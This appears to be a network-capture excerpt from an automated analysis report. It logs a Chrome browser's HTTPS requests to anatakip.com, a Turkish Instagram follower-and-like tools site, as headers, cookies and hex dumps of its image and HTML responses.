                    2024-05-26 22:57:44 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d3 50 4c 54 45 ff ff ff c6 c6 c6 ac ac ac e3 e3 e3 bb bb bb d4 d4 d4 be be be 7d 7d 7d 77 77 77 b9 b9 b9 b7 b7 b7 e7 e7 e7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ
                    2024-05-26 22:57:44 UTC714INData Raw: 70 31 e5 d8 1c e8 40 71 63 5a f8 9c 95 30 2a b1 5b d2 99 ed cf 5f 25 26 1c 4c 6f 8f b2 86 6b a8 a5 c4 4a 7d ff fb 0d af a3 af 59 1f 9e 64 c7 a8 a5 d4 42 cc da 75 9d 38 f5 ef 42 56 2d 7e 29 c9 49 96 60 29 e3 59 4b ee 46 74 d5 67 96 9a 63 18 39 8e a9 aa fa f6 fb 37 a9 9f 55 95 b6 a9 3b 54 0d 3f 0c 20 51 0d 92 08 3c 6d 51 30 2c 32 32 32 51 97 a9 ea b9 6b 18 65 d5 3b 25 e9 f0 7f d4 ba f5 bf 2c 61 c3 27 2f 48 54 83 d1 f8 34 0c 95 82 18 fb b1 16 01 11 6d 32 49 2a 6e 21 d7 d8 92 27 bf 71 97 fa 53 96 e5 cf d8 74 77 8e 4c 19 8c 76 19 0c b2 9e 01 fa ca b1 76 59 ee 4b 7a 70 26 cb e3 c9 35 56 96 96 2b 7f df 22 a6 2b 3f 29 8a 36 de da ab f8 40 82 a2 d7 a7 37 09 e3 14 a5 0b 74 4e 88 eb a2 cf 14 85 e7 31 12 f2 84 ea 15 77 88 82 fc 02 41 78 e7 c3 69 74 be 93 2f 78 41 bc
                    Data Ascii: p1@qcZ0*[_%&LokJ}YdBu8BV-~)I`)YKFtgc97U;T? Q<mQ0,222Qke;%,a'/HT4m2I*n!'qStwLvvYKzp&5V+"+?)6@7tN1wAxit/xA


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.549780104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:47 UTC727OUTGET /favicon.ico HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/login
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:47 UTC678INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:47 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9PUFlFskbWZL3qQtICfY0vi683sxbHOK0mM375iuBBCvOVvXBEUo8w2Zhj4hp4EKEmGyXHJxaWVETzlzm0TQCA3oXs4Kz%2FhM88T2LJuRSedC5DR0jzKxhBmrsqy5JYg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15dbdde488ce9-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:47 UTC691INData Raw: 34 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                    Data Ascii: 4c8<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                    2024-05-26 22:57:47 UTC540INData Raw: 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72
                    Data Ascii: tyle="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br
                    2024-05-26 22:57:47 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.549784104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:53 UTC782OUTGET /tools HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:53 UTC734INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOZzHxbpKEJIQHeOpc6WGC1Jugvb3jiaM4XH4L5N7GH9VIe3FgoFRXH2CFfyr0VWGW%2FZN7MouxsMzoSUZK8W3xqZUI7ziCi%2FbWxF6FUii9Ro3%2Fkpj0xQqB4zYhy74bI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15de45b0c43a1-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:53 UTC635INData Raw: 32 66 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 2f00<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:53 UTC1369INData Raw: 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 54 6f 6f 6c 73 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c 20 c4 b0 6e 73 74 61 67 72 61 6d 20 74 61 6b
                    Data Ascii: paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Tools | AnaTakip kendinizi instagram en iyi profili haline getirin , nstagram tak
                    2024-05-26 22:57:53 UTC1369INData Raw: 3d 22 2f 6c 6f 67 69 6e 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 69 67 6e 2d 69 6e 22 3e 3c 2f 69 3e 0a 47 c4 b0 52 c4 b0 c5 9e 0a 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 20 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e
                    Data Ascii: ="/login"><i class="fa fa-sign-in"></i>GR</a></p></li></ul><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".navbar-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span
                    2024-05-26 22:57:53 UTC1369INData Raw: b1 20 62 69 6c 67 69 20 69 c3 a7 69 6e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 63 6b 61 67 65 73 22 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 22 3e 74 c4 b1 6b 6c 61 79 c4 b1 6e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 2e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 30 30 30 30 3b 22 3e 28 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 22 3e 42 75 20 48 61 66 74 61 79 61 20 c3 96 7a 65 6c 26 6e 62 73 70 3b 69 6e 64 69 72 69 6d 20 42 61 c5 9f 6c 61 64 c4 b1 3c 2f 73 70 61 6e 3e 29 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 2f 3e 0a 3c 64 69 76 20 63 6c 61 73
                    Data Ascii: bilgi iin</span><a href="/packages"> <span style="font-size:18px;">tklayn</span></a>.&nbsp;&nbsp;<span style="color:#ff0000;">(<span style="font-size:20px;">Bu Haftaya zel&nbsp;indirim Balad</span>)</span></strong></p></div><hr/><div clas
                    2024-05-26 22:57:53 UTC1369INData Raw: c4 b1 6e 20 74 61 6d 61 6d c4 b1 20 67 65 72 c3 a7 65 6b 20 6b 75 6c 6c 61 6e c4 b1 63 c4 b1 6c 61 72 20 74 61 72 61 66 c4 b1 6e 64 61 6e 64 c4 b1 72 2e 3c 2f 70 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 62 6c 6f 63 6b 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 2f 73 65 6e 64 2d 63 6f 6d 6d 65 6e 74 22 3e 59 6f 72 75 6d 20 47 c3 b6 6e 64 65 72 6d 65 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 20 70 61 6e 65 6c 2d 64 65 66 61 75 6c 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6e 65 6c 2d 68 65 61 64 69 6e 67 22 3e 53 74 6f 72 79 20 47 c3 b6 72 c3 bc 6e 74 c3 bc 6c 65 6e 6d 65 20 41 74 6d 61 3c 2f 64 69 76 3e 0a 3c 64
                    Data Ascii: n tamam gerek kullanclar tarafndandr.</p><a class="btn btn-block btn-primary" href="/tools/send-comment">Yorum Gnderme</a></div></div><hr/><div class="panel panel-default"><div class="panel-heading">Story Grntlenme Atma</div><d
                    2024-05-26 22:57:53 UTC1369INData Raw: 64 69 6e 67 3a 20 30 3b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 67 72 6f 75 70 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 2f 73 65 6e 64 2d 6c 69 6b 65 22 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 68 65 61 72 74 22 3e 3c 2f 69 3e 20 42 65 c4 9f 65 6e 69 20 47 c3 b6 6e 64 65 72 20 3c 2f 61 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 2f 73 65 6e 64 2d 66 6f 6c 6c 6f 77 65 72 22 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 75 73 65 72 2d 70 6c 75 73 22 3e 3c 2f 69 3e 20 54 61 6b 69
                    Data Ascii: ding: 0;"><div class="list-group" style="margin-bottom: 0;"><a href="/tools/send-like" class="list-group-item"><i class="fa fa-heart"></i> Beeni Gnder </a><a href="/tools/send-follower" class="list-group-item"><i class="fa fa-user-plus"></i> Taki
                    2024-05-26 22:57:53 UTC1369INData Raw: 73 73 65 74 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2e 70 6e 67 22 20 2f 3e 0a 3c 70 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 61 74 61 6b 69 70 2e 63 6f 6d 22 3e 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 76 65 20 74 61 6b 69 70 c3 a7 69 20 73 69 74 65 73 69 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 22 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 22 3e 41 72 61 c3 a7 6c 61 72 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 70 61 63 6b 61 67 65 73 22 3e 50 61 6b 65 74 6c 65 72 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 62 6c 6f 67 22 3e 42 6c 6f 67 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f
                    Data Ascii: ssets/logo/logo.png" /><p><a href="https://anatakip.com">instagram beeni ve takipi sitesi</a></p><ul class="list-unstyled"><li><a href="/tools">Aralar</a></li><li><a href="/packages">Paketler</a></li><li><a href="/blog">Blog</a></li></
                    2024-05-26 22:57:53 UTC1369INData Raw: b1 6e 64 61 6e 20 62 69 7a 65 20 75 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 70 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 30 61 66 66 30 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6b 79 70 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 53 6b 79 70 65 20 3c 2f 73 70 61 6e 3e 0a 3a 0a 3c 62 3e 3c 2f 62 3e 0a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6a 71 75 65 72 79 2f 32 2e 32 2e 34 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 62 6f
                    Data Ascii: ndan bize ulaabilirsiniz.</p><p><span style="color:#00aff0"><i class="fa fa-skype" aria-hidden="true"></i> Skype </span>:<b></b></p></div></div></div></div><script src="/assets/jquery/2.2.4/jquery.min.js?v=1"></script><script src="/assets/bo
                    2024-05-26 22:57:53 UTC1369INData Raw: 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0a 09 09 09 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 2f 2a 20 53 74 61 79 20 69 6e 20 70 6c 61 63 65 20 2a 2f 0a 09 09 09 09 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 2f 2a 20 53 69 74 20 6f 6e 20 74 6f 70 20 2a 2f 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 20 2f 2a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 62 6f 78 20 2a 2f 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 74 6f 70 3a 20 30 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2f 2a 20 46 75 6c 6c 20 77 69 64 74 68 20 2a 2f 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 2f 2a 20 46 75 6c 6c 20 68 65 69 67 68 74 20 2a 2f 0a 09 09
                    Data Ascii: ay: none; /* Hidden by default */position: fixed; /* Stay in place */z-index: 1; /* Sit on top */padding-top: 100px; /* Location of the box */left: 0;top: 0;width: 100%; /* Full width */height: 100%; /* Full height */
                    2024-05-26 22:57:53 UTC453INData Raw: 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 2e 6d 6f 64 61 6c 2d 62 6f 64 79 2c 0a 09 09 09 23 6c 6f 67 67 65 64
                    Data Ascii: dal-header::before, #loggedAnnouncementModal .modal-header::after {display: none;}#announcementModal .modal-content, #loggedAnnouncementModal .modal-content {padding: 0;}#announcementModal .modal-content .modal-body,#logged


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.549785104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:53 UTC736OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/tools
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:54 UTC738INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JJB1XrMcPZobATzAKcsYFsXJuctm4V%2BY8IBXz9F4g37DtyETpzWEAjTOtP6fpWNAfylYCdmMFtwezPkBpwvEJv0cBHRYqZReVQn3h4R2BkSfpbyjHfUFoko%2BcXOCdU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15de6fb734219-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:54 UTC631INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
